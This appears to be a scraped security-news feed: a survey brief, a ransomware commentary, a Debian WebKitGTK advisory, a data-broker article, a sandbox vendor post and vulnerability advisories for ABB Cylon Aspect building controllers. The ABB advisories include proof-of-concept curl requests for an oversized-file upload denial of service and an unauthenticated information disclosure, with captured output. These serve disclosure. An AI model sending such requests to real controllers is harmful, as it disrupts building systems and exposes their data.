Too much access and privilege, plus a host of unsafe cyber practices, plague most workplaces, and the introduction of tools like GenAI will only make things worse.

Source: Yuri Arcurs via Alamy Stock Photo

NEWS BRIEF

A survey of more than 14,000 employees across a variety of industries shows that employee behaviors when it comes to sensitive data often put organizations at risk.

The findings show that 80% of those surveyed access workplace applications from personal devices that lack necessary security controls. In addition, privileged access extends beyond IT admins, and 40% of respondents habitually download customer data. A third of respondents are able to alter sensitive data without controls, and roughly 30% can approve large financial transactions on their own.

In addition to this, the CyberArk study found that employees often practice bad cybersecurity habits. About half (49%) of respondents admitted to reusing the same login credentials for multiple work applications, while 36% use the same credentials for both work and personal applications; about 65% copped to bypassing cybersecurity policies for personal ease. All of these practices heighten the risk of organizations falling victim to leaks and data breaches.

The security firm warned that such behaviors will only continue with the growing use of on-the-rise tools, such as artificial intelligence, which are increasingly being introduced into the workplace. Roughly 72% of employees use AI tools, which can pose a threat when sensitive data is inputted into them — a likely scenario as 38% of employees only sometimes, if ever, adhere to guidelines dictating the handling of sensitive data when it comes to AI.

Cyber-Unsafe Employees Increasingly Put Orgs at Risk

Until C-level executives fully understand potential threats and implement effective mitigation strategies, healthcare organizations will remain vulnerable and at risk of disruption.

Source: Olekcii Mach via Alamy Stock Photo

COMMENTARY

Ransomware attacks keep increasing day to day, and healthcare systems are one of the prime targets. Despite ongoing efforts to patch vulnerabilities, the problem persists. Patching, long considered a cornerstone of cybersecurity defense, is no longer enough. The consequences of the attack for healthcare organizations go far beyond reputational and financial damage — they are a matter of patients' lives.

The reason is that all healthcare organizations are treasures of highly critical information: Medical records, personal information, and financial details all command a high price in the black market. What's more important, healthcare services cannot afford any downtime, and because these systems need to be online and working at all times, victims usually pay the ransom.

The growing sophistication of ransomware, combined with the complex IT environments in healthcare, means that traditional defenses like patching fall short. Meanwhile, attackers are finding a way to expose the open gaps that patching alone cannot close, even with regular updates.

**The Patching Problem**

Many believe patching is a line of defense that stops ransomware in its tracks, but patching has gradually reached its threshold of limitations. Most healthcare IT systems are amalgamating old legacy technology, critical life-supporting medical devices, and modern infrastructure, making it very difficult to implement patching. For instance, most medical devices run operating systems that are no longer supported by vendors. Patching is very risk-prone and might involve downtime, which affects patient service.

Patching covers only the known vulnerabilities. On the other side, ransomware attackers are increasingly leveraging zero-day vulnerabilities, those that have not yet been discovered, or do not have any patch available for them. Even fully patched systems can be vulnerable to such an attack, leaving the organization at risk for ransomware.

Then, we need to think about a lateral movement problem. Once inside a network, ransomware can easily cross over into unpatched or misconfigured systems. One more factor in the case of ransomware attacks is that there are no more single-entry points; the attackers simply use stolen credentials and/or unprotected routes of access to move across the network, infecting multiple systems and amplifying resultant damage.

**Expanding the Scope of Defense**

With such challenges, health organizations really do need to rethink their approach toward ransomware defense; patching, though necessary, represents only one piece of a much larger jigsaw puzzle.

The first recommended strategy is implementing advanced threat protection (ATP) solutions to provide an extra layer of security. These utilities use artificial intelligence and machine learning to detect suspicious activities and block ransomware before they actually cause serious damage. Instead of waiting for a patch that will fix a vulnerability, ATP systems can detect emergent threats in real-time, offering a proactive approach to defense.

Segmentation of a network can prevent ransomware from spreading; this is where healthcare organizations isolate the network into smaller segments. This is important, as once a part of the network is compromised, then the rest of it will always be safe. This is a very crucial tactic in containing ransomware and limiting its damage.

Phishing remains one of the most common methods for deploying ransomware, and healthcare staff are often targeted. Training employees to recognize phishing attempts, combined with multifactor authentication (MFA), adds an essential layer of protection. Even if attackers manage to steal credentials, MFA can stop them from gaining access to critical systems.

Incident response planning is also essential. Organizations need to be prepared for the worst-case scenario. Regularly updated backups, stored separately from the main network, are important for recovery after an attack. These backups ensure that healthcare services can be restored without paying a ransom. These plans should be tested periodically to make sure they work when needed most.

**Healthcare Can't Afford to Ignore the Need for a Broader Defense**

Ransomware is not just a technical issue; it's most definitely a business problem that no healthcare organization can afford to dismiss. Recent high-profile attacks have proved how vulnerable the providers of healthcare are; while patching remains an essential process, it only forms one part of the much larger total solution.

Security in healthcare must go beyond patching and involve a more strategic approach. This can be shown by the ever-increasing pressure placed by regulatory bodies, such as DHHS, to even further restrict cybersecurity guidelines for providers. Patch management falls under compliance, but it seems obvious that a more encompassing proactive approach to security must be enacted if patient data and operations are to be secured.

Healthcare leaders need to take this into consideration and invest a larger focus on enterprise-wide risk management. Until C-level executives fully understand potential threats and implement effective mitigation strategies, healthcare organizations will remain vulnerable and at risk of disruption.

**About the Author**

Lead Security Engineer, C4HCO

Claudio Gallo is a lead security engineer of the Colorado Marketplace Exchange, dedicated to protecting critical information in the healthcare and insurance industries. With expertise in application security, cloud architecture, and compliance, Claudio designs innovative strategies to safeguard sensitive data and ensure trust in important services. Passionate about making a meaningful difference, he is equally committed to mentoring aspiring professionals in the information security industry, sharing knowledge, and fostering the next generation of cybersecurity talent.

Ransomware's Grip on Healthcare

Debian Linux Security Advisory 5823-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Clement Lecigne and Benoit Sevens discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems. Clement Lecigne and Benoit Sevens discovered that processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5823-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
December 02, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-44308 CVE-2024-44309

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-44308

    Clement Lecigne and Benoit Sevens discovered that processing  
    maliciously crafted web content may lead to arbitrary code  
    execution. Apple is aware of a report that this issue may have  
    been actively exploited on Intel-based Mac systems.

CVE-2024-44309

    Clement Lecigne and Benoit Sevens discovered that processing  
    maliciously crafted web content may lead to a cross site scripting  
    attack. Apple is aware of a report that this issue may have been  
    actively exploited on Intel-based Mac systems.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.46.4-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmdOKWgACgkQAAyEYu0C  
2AKrzQ/+MLk4EQ2c7zkYM1BU8PzgI1oNGvvl6VTcM696OWCvnj+hzyFLFsrwtwoc  
GeZ+Enz6VKBvtsXxTDgXLXw9NbFfFiVX2LnlIOzPcqfBXg9RTs70WwSM4CGUHTBs  
nPK1yixyYjCOy4MrlaCKrHttlrxqvK7VJeY0RypTfAkJlhzmHHdSpCfYAlJXtpFb  
dbGtP7pSxBnguTWq+oJFTG2wjyXjLcfd81QgcpOgINtnyn4hQaVVJOHr/H9+xoV5  
Rz6iGRS+MpmXyqc2kw2alEfY8UxfaP8K9X2u0A/YV8t+N6GKBLUNOo+XlFIFFb/J  
vbPbXRqaKCQzW0sIZ5um4Q9aBLX3JUiZIuz6+4lb5NTBbhnpjkG+EBGaoqG3OodY  
bZ9qmFZpXUYE/vSUzAcRWNsD6jWFV89Exu1BivAZdJ7J7tYzvs/2szHsATMkNjZo  
Twb6LH7PBd90hU6PETbuknrBgYd5dbdXXKn+v3SH9HXLMLd5S+xobEOMtGjG2zsd  
Z46JPP1FNqPDY+rHhWCDyVcvRnXx0WhY7PrGV/rjJ89M9xVYVZc136Bx8xrrULmo  
ZiAFBnz5VZRdeF/ma/inzsb8vXDCPX+0ruxtHdISiJf3Shjqft2mdfcR5mwPazab  
9GD3rCMl42A0Tftjg7b4f5J1x3ufy+kvfs+fEQ0jXYIuvoh7kF4=  
=v253  
-----END PGP SIGNATURE-----

Debian Security Advisory 5823-1

A new proposal by the Consumer Financial Protection Bureau would use a 54-year-old privacy law to impose new oversight of the data broker industry. But first, the agency must survive Elon Musk.

The United States government’s leading consumer protection watchdog announced Tuesday the first steps in a plan to crack down on predatory data broker practices that the agency says help fuel scams, violence, and threats to US national security.

The Consumer Financial Protection Bureau is proposing a rule that would allow regulators to police data brokers under the Fair Credit Reporting Act (FCRA), a landmark privacy law enacted more than a half century ago. Under the proposal, data brokers would be limited in their ability to sell certain sensitive personal information, including financial data and credit scores, phone numbers, Social Security numbers, and addresses. The CFPB says that closing the loopholes allowing data brokers to trade in this data with little to no oversight will benefit vulnerable people and the US as a whole.

“By selling our most sensitive personal data without our knowledge or consent, data brokers can profit by enabling scamming, stalking, and spying,” Rohit Chopra, CFPB’s director, said in a statement. “The CFPB’s proposed rule will curtail these practices that threaten our personal safety and undermine America’s national security.”

Passed in 1970 as the first US privacy law, the FCRA requires “credit reporting agencies” to adhere to certain standards of accuracy and privacy in their dealing with people’s financial information, including credit histories, credit scores, debt payment histories, and other related data. The CFPB’s proposal aims to treat data brokers like credit reporting agencies when they deal in this sensitive data. It would require data brokers to obtain “separate, explicit authorization” before acquiring or sharing people’s credit information, rather than burying these permissions in expansive legal documents that surveys show are often unread or impossible for the average person to parse.

In a conversation with reporters on Monday, Chopra pointed to the recent attacks on US telecommunications systems, which the government has attributed to China, to emphasize the value of personal data to the nation's foreign rivals. “But often, our adversaries don't need to hack anything,” he says. “Data brokers, the outfits that collect and sell detailed information about our personal and financial lives, are making this data available to anyone willing to pay a price.”

The action proposed by the CFPB is aimed, Chopra says, at stopping data brokers from “enabling scammers, stalkers and spies undermining our personal safety and America's national security.”

The CFPB’s idea of using existing US law to regulate data brokers is not novel. In February 2023, a group of consumer-focused nonprofits urged Chopra to enforce the powers the FCRA affords regulators to prevent data brokers from engaging in these potentially damaging practices.

“Protecting the personal information of all people in the US is increasingly urgent in our current political climate,” says Laura Rivera, attorney with Just Futures Law, a nonprofit that supports grassroots activists. “The stakes are too high to continue to let the data broker industry sell our information at their discretion, where the status quo has made it ripe for abuse and targeting from harmful actors.”

In a briefing with WIRED on Monday, CFPB officials declined to comment on whether they believe the regulatory action will be short lived, as president-elect Donald Trump plans to empower a number of Silicon Valley figures to reorganize the federal government with the aim of targeting “waste and fraud.”

Elon Musk, who is coleading an office named after a meme coin—the Department of Government Efficiency, or DOGE—directly attacked the CFPB's work last week, calling for the agency to be “deleted.” Musk's remarks followed an attack on the agency's work by Marc Andreessen, a venture capitalist, who claimed on a recent episode of Joe Rogan’s podcast that the agency is “terrorizing” banking startups.

The CFBP was founded in 2011 with the aim of protecting consumers from the kinds of fraud and abuse that kicked off the 2008 financial crisis.

A CFPB official tells WIRED that the agency is also concerned about data being transmitted in ways that companies allege protects people's identities but in reality can be "de-anonymized" in simple ways, as studies have repeatedly shown. "As technology advances, we surmise that it will be even easier to de-mask purportedly de-identified data," one official said. The proposed rule thus includes a range of guidelines for credit reporting agencies involved in selling data they alleged has been de-identified.

Asked whether the proposal would extend to US government agencies, an official says that US law sets forth "very clear pathways" for the government to purchase personally identifying data for law enforcement and intelligence purposes. In a recent case, US Immigration and Customs Enforcement was discovered by reporters to have purchased access to the personal data of Americans in an attempt to investigate immigrants—data acquired by the media conglomerate Thomson Reuters, which it provided to custeroms in contracts the company disclosed were worth more than $100 million. (Thomson Reuters previously denied that the purpose of the data is to track undocumented immigrants and has emphasized that its database does not contain information that normally requires a search warrant to access.)

“We are not disrupting any of those pathways,” a CFPB official says. The agency is requesting comment, however, on the potential impacts of such government purchases to ensure that access is “appropriate.”

Emily Peterson-Cassin, director of corporate power at the nonprofit advocacy group Demand Progress’s Education Fund, commended the CFPB’s proposal and urged the incoming Trump administration to see it through.

“The CFPB is doing something important that will resonate with every single American. Anyone you pick off the street can tell you about the daily scam texts, emails and calls they receive from fraudsters who easily buy our contact information from shady, unaccountable data brokers,” Peterson-Cassin says. “Finally, someone—specifically the CFPB—has stepped in to stop this daily plague affecting hundreds of millions of people by applying real standards to their sale of our sensitive information.”

Top US Consumer Watchdog Has a Plan to Fight Predatory Data Brokers

New zero-day attack bypasses antivirus, sandboxes, and spam filters using corrupted files. Learn how ANY.RUN’s sandbox detects and…

New zero-day attack bypasses antivirus, sandboxes, and spam filters using corrupted files. Learn how ANY.RUN’s sandbox detects and combats these advanced threats.

A new zero-day attack campaign has surfaced, leveraging corrupted files to slip past even the strongest security protection. Recently identified by cybersecurity researchers at ANY.RUN, this attack demonstrates how sophisticated modern cyber threats have become. 

By bypassing antivirus software, sandbox environments, and email spam filters, these malicious files reach their targets with alarming efficiency. Let’s dive deeper into the details of this attack, explore why it’s so effective, and uncover how it can be identified to prevent further damage.

****New Zero-Day Attack Overview****

According to ANY.RUN research, this zero-day attack campaign has been active since at least August 2024. The research has uncovered that attackers are employing a unique technique: deliberately corrupting files to evade detection. 

These corrupted files, often disguised as ZIP archives or Microsoft Office documents like DOCX, bypass traditional security measures by exploiting gaps in standard file-handling procedures.

Despite appearing damaged, the files remain fully functional, executing malicious code when opened in their intended programs. Here’s what makes this approach particularly dangerous:

*   **Antivirus evasion**: Traditional antivirus solutions struggle to scan corrupted files properly. As a result, many classify these files as clean or return a “not found” error.
*   **Sandbox resistance**: Many static analysis tools fail to process these files because their corrupted structure prevents accurate identification.
*   **Spam filter bypass**: Even Outlook’s robust spam filters can’t block these malicious emails, allowing the payload to slip straight into inboxes.

As a result, the corrupted files execute successfully on the victim’s operating system, remaining invisible to most defences.

However, ANY.RUN’s interactive sandbox was able to overcome these challenges and detect malicious activity. Unlike other security tools, the sandbox dynamically analyzes corrupted files by interacting with them in real time. This allows it to uncover their true behaviour and accurately identify them as threats.

Malicious activity detected by ANY.RUN sandbox

In the following analysis session, the sandbox successfully detects the threat and labels it as malicious activity, thanks to its automated interactivity feature. This advanced capability launches the corrupted files in their corresponding programs, allowing the sandbox to observe and identify malicious behaviour that traditional tools might overlook.

****How the Zero-Day Attack is Executed****

During this cyberattack campaign, attackers exploit user applications’ built-in recovery mechanisms to restore and execute damaged or corrupted files. Below you can find more details about these steps: 

The analysis session revealed a corrupted file delivered via email, slipping past traditional detection systems. Security tools struggled to process the file, leaving it undetected. 

However, ANY.RUN’s sandbox took a different approach by opening the file in its intended application. When built-in recovery features, like Microsoft Word’s repair mechanism, were activated, the malicious payload executed as expected. 

The sandbox’s interactivity enabled it to identify this behaviour and flag the file as malicious, demonstrating its effectiveness in detecting threats that evade traditional tools.

****Get Your Black Friday Deal from ANY.RUN****

Combat advanced cyber threats like corrupted file attacks with ANY.RUN’s interactive sandbox. Its Automated Interactivity launches and analyzes even the most elusive files, revealing malicious behaviours that traditional tools miss.

With ANY.RUN, you can uncover the full picture of complex cyberattacks and protect your systems effectively. This Black Friday, take advantage of exclusive offers and strengthen your protection. Hurry, offers end December 8:

*   **For individual users**: Get 2 licenses for the price of 1.
*   **For teams**: Enjoy up to 3 licenses + an annual basic plan for Threat Intelligence Lookup, ANY.RUN’s extensive threat intelligence database.

See all offers and test the service with a free trial today →

How Attackers Use Corrupted Files to Slip Past Security

Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 gift card.

What a mess! Things are in a real bind here. Link us to your best cybersecurity-related captions to describe the above scene and our favorite entry will win its wordsmith a $25 gift card.

Here are four convenient ways to submit your ideas before the Dec. 31 deadline:

*   Via social media: X, Facebook, and LinkedIn. (If you win, we'll respond to you on the same platform, requesting your email address.)
    

**Last Month's Winner**

Shout out — and a $25 gift card — to Matthew Tompkins, federal senior intelligence coordinator at the Federal Energy Regulatory Commission, for back-to-back wins. The winning caption for last month's "Aerialist's Choice" cartoon is below. Some noteworthy contenders included: "We’ll definitely have a zero trust environment after this," "Strong defenses rely on team work. Be ready to catch every threat," and "You can only catch so much. Hope the net catches the rest." A big thank you to all who participated.

**About the Author**

Cartoonist

John Klossner has been drawing technology cartoons for more than 15 years. His work regularly appears in Computerworld and Federal Computer Week. His illustrations and cartoons have also been published in The New Yorker, Barron's, and The Wall Street Journal.

Name That Edge Toon: Shackled!

ABB Cylon Aspect version 3.08.00 suffers from a vulnerability in the fileSystemUpdate.php endpoint of the ABB BEMS controller due to improper handling of uploaded files. The endpoint lacks restrictions on file size and type, allowing attackers to upload excessively large or malicious files. This flaw could be exploited to cause denial of service (DoS) attacks, memory leaks, or buffer overflows, potentially leading to system crashes or further compromise.

    ABB Cylon Aspect 3.08.00 (fileSystemUpdate.php) Insecure File UploadVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: A vulnerability exists in the fileSystemUpdate.php endpoint of theABB BEMS controller due to improper handling of uploaded files. The endpointlacks restrictions on file size and type, allowing attackers to upload excessivelylarge or malicious files. This flaw could be exploited to cause Denial-of-Service(DoS) attacks, memory leaks, or buffer overflows, potentially leading to systemcrashes or further compromise.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5866Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5866.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl --path-as-is -X POST "http://192.168.73.31/fileSystemUpdate.php" \> -H "Content-Type: multipart/form-data; boundary=----J0X" \> -H "Accept-Encoding: gzip, deflate, br" \> -H "Cookie: PHPSESSID=xxx" \> -d "------J0X\> Content-Disposition: form-data; name=\"userfile\"; filename=\"test.aam\"\> Content-Type: application/octet-stream\> \> 5GB_CONTENT\> ------J0X--\> "HTTP/1.1 302 FoundStrict-Transport-Security: max-age=31536000; includeSubdomainsExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheLocation: fileSystemUpdateExecuteDisplay.php?file=test.aamContent-type: text/html; charset=UTF-8Content-Length: 0Date: Thu, 28 Nov 2024 15:05:44 GMT

ABB Cylon Aspect 3.08.00 fileSystemUpdate.php File Upload / Denial Of Service

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various BACnet MS/TP statistics running on the device.

  
ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated information  
disclosure vulnerability. An unauthorized attacker can reference the affected  
page and disclose various BACnet MS/TP statistics running on the device.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5865  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5865.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl http://192.168.73.31/mstpstatus.php  
Thu Nov 28 10:13:51 UTC 2024<br><div id='Port 0Stat' class='portStats'><div id='Port 0Load'>Port 0 Load: 123    Average time (ms) to wait for token return  
47      Average time (ms) to wait for for a reply  
20      Max info frames  
1063    Estimated time for max_nfo_frmaes tx plus token cycle (ms)  
18      Estimated max rate (trasactions per sec)  
38      congestion threashold  
%</div><div id='Port 0BPSTotal'>Port 0 BPS (Total): </div><div id='Port 0BPSOurs'>Port 0 BPS (Mine): </div></div><div id='Port 1Stat' class='portStats'><div id='Port 1Load'>Port 1 Load: 34    Average time (ms) to wait for token return  
40      Average time (ms) to wait for for a reply  
20      Max info frames  
834     Estimated time for max_nfo_frmaes tx plus token cycle (ms)  
23      Estimated max rate (trasactions per sec)  
48      congestion threashold  
%</div><div id='Port 1BPSTotal'>Port 1 BPS (Total): </div><div id='Port 1BPSOurs'>Port 1 BPS (Mine): </div></div><br />  
$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ <br />  
Proto:          0<br />  
<br />  
Port 0 Statistics =======================<br />  
Baud Rate:        38400<br />  
RX Characters:     60521<br />  
RX echoes:         0<br />  
RX Errors:         31<br />  
TX Characters:     49671<br />  
Echo detect fails: 0<br />  
<br />  
Port 0 MSTP State =======================<br />  
ValidRXFrameCnt:   42320<br />  
InvdRXFrameCnt:    61<br />  
rxDataFrames:      16558<br />  
rxToken:           29242<br />  
TXFrameCnt:        2072<br />  
TXQueCnt:          1<br />  
CongestionCnt:     0<br />  
Poll_Station:      0<br />  
SoleMaster:        FALSE<br />  
<br />  
Port 0 config =======================<br />  
Nmax_master:       127<br />  
Nmax_info_frames:  20<br />  
This_Station:      0<br />  
Tno_token:         500<br />  
Tusage timeout     30<br />  
congestion (auto): 38<br />  
Npoll:             50<br />  
<br />  
<br />  
Port 1 Statistics =======================<br />  
Baud Rate:        38400<br />  
RX Characters:     0<br />  
RX echoes:         0<br />  
RX Errors:         0<br />  
TX Characters:     33632<br />  
Echo detect fails: 0<br />  
<br />  
Port 1 MSTP State =======================<br />  
ValidRXFrameCnt:   0<br />  
InvdRXFrameCnt:    0<br />  
rxDataFrames:      0<br />  
rxToken:           0<br />  
TXFrameCnt:        2<br />  
TXQueCnt:          0<br />  
CongestionCnt:     0<br />  
Poll_Station:      29<br />  
SoleMaster:        TRUE<br />  
<br />  
Port 1 config =======================<br />  
Nmax_master:       127<br />  
Nmax_info_frames:  20<br />  
This_Station:      0<br />  
Tno_token:         500<br />  
Tusage timeout     30<br />  
congestion (auto): 48<br />  
Npoll:             50<br />  
<br />

ABB Cylon Aspect 3.08.01 mstpstatus.php Information Disclosure

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various protocol thread information running on the device.

    ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information DisclosureVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated informationdisclosure vulnerability. An unauthorized attacker can reference the affectedpage and disclose various protocol thread information running on the device.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5864Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5864.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 